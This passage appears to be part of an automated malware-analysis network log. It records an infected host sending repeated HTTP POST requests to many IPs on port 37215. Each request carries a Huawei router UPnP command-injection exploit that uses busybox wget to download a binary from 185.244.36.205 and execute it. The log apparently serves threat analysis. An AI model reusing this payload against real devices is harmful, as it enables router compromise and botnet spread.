                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              450192.168.2.153654231.237.76.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719528913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              451192.168.2.155643645.116.127.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719547033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              452192.168.2.155768441.193.125.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719563961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              453192.168.2.153847494.237.29.15537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719619989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              454192.168.2.1532962102.152.61.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719619989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              455192.168.2.1534206102.234.176.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719619989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              456192.168.2.153898631.130.37.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719621897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              457192.168.2.155950245.138.30.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719635010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              458192.168.2.1533786156.47.70.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719649076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              459192.168.2.1534262190.191.228.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719695091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
